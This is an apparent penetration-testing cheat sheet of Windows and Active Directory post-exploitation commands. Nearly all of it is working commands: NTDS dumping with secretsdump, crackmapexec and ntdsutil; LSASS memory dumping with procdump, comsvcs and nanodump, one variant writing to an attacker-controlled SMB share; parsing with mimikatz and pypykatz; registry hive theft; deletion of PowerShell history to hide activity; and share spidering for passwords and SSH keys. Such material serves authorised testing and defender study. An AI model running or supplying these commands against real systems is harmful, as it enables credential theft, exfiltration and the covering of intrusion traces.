Skip to content

Post-Exploitation

Tools #

Dumping Credentials1 #

NTDS dumping #

Impacket-secretsdump directly #

1
secretsdump.py company.local/administrator:P\@[email protected] -outputfile secretsdump.txt -resumefile resumefile -pwd-last-set -user-status -history

Crackmapexec #

1
crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" --ntds DC01.acme.corp

ntdsutil23 #

1
2
3
4
5
6
ntdsutil "activate instance ntds" "ifm" "create full C:\Windows\temp\ntdsutil" quit quit
# Via WMIC from a remote machine to DC
wmic /node:dc01.domain.com process call create "cmd.exe /c ntdsutil \"ac in ntds\" ifm \"cr fu C:\Windows\temp\ntdsutil\" q q"

# Then copy to kali and use secretsdump
secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -security registry/SECURITY LOCAL -pwd-last-set -user-status -history -outputfile output

Next steps #

Dumping LSASS #

  • Try to archive and compress before exiltrating.
  • After below, see Data Exfiltration
  • See Parsing LSASS below
  • Via procdump.exe 
    1
2
    procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
procdump64.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
  • Via Task manager
    • Open Task Manager -> Details -> lsass.exe -> Right Button -> "Create dump file"
  • Rundll32 comsvcs (get PID)
    • Dump and exfiltrate later 
      1
      C:\Windows\System32\rundll32.exe comsvcs.dll, MiniDump <pid> C:\Windows\temp\lsass.dmp full
    • Remote LSASS dump4
      • Run below on the target/victim machine 
        1
2
        net use x: \\smbserver_under_your_control\c$\
powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lsassdump.bin full
  • Crackmapexec 
    1
2
    crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" -M nanodump victimPC01.acme.corp
crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" -M handlekatz victimPC01.acme.corp

Parsing LSASS #

  1. Kali 
    1
    pypykatz lsa -k ./kerberos minidump ./lsass.dmp
  2. Windows 
    1
    mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit

Exporting registry hives & local decryption #

  1. On the target machine 

    1
2
3
4
    mkdir c:\temp
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

  2. Retrieve the files

  3. On local machine (~Kali) 

    1
    secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

  4. On target machine 

    1
2
3
4
    del c:\temp\sam.save
del c:\temp\security.save
del c:\temp\system.save
rmdir c:\temp # Except when the "temp" folder already existed before Step 1. # Check if there are other contents in the folder

Delete Powershell history #

  • Delete the "file" given by this command: 
    1
    (Get-PSReadlineOption).HistorySavePath
  • Or just replace the below 
    1
    del C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Looking for files in the Domain #

  • Useful when
    • escalating from a domain compromise to a full network or infrastructure compromise by looking for sensitive files such as:
      • ssh keys
      • password files
      • offline password manager DB files
    • sensitive files in "authenticated" shares
      • Attempting to escalate privileges and pivot to other hosts/networks
  • About command:
    • spider = "*" to spider all shares per host
    • long list of --exclude-dirs to avoid scanning in the ADMIN$ or Windows folder and concentrate on other folders.
    • Edit the --pattern for more filename patterns
1
crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" --spider "*" --exclude-dirs "addins,ADFS,appcompat,apppatch,AppReadiness,assembly,bcastdvr,Boot,Branding,CbsTemp,Cluster,Containers,CSC,Cursors,debug,diagnostics,DiagTrack,DigitalLocker,dot3svc,Downloaded Program Files,drivers,en-US,Fonts,GameBarPresenceWriter,Globalization,Help,IdentityCRL,IME,ImmersiveControlPanel,INF,InputMethod,Installer,L2Schemas,LiveKernelReports,Logs,Media,Microsoft.NET,Migration,Minidump,ModemLogs,OCR,Offline Web Pages,Panther,Performance,PLA,PolicyDefinitions,Prefetch,PrintDialog,Program Files,Program Files (x86),Provisioning,Registration,RemotePackages,rescache,Resources,SchCache,schemas,security,ServiceProfiles,ServiceState,servicing,Setup,ShellComponents,ShellExperiences,SKB,SoftwareDistribution,Speech,Speech_OneCore,System,System32,SystemApps,SystemResources,SysWOW64,TAPI,Tasks,Temp,tracing,twain_32,Vss,WaaS,Web,Windows,WinSxS,wlansvc" --pattern passw ssh username id_rsa id_ed25519 .pub  --only-files ~/Scope/all.txt

  1. Pure Security 

  2. c0d3xpl0it 

  3. Hacking Articles 

  4. Responder 

Last update: April 16, 2022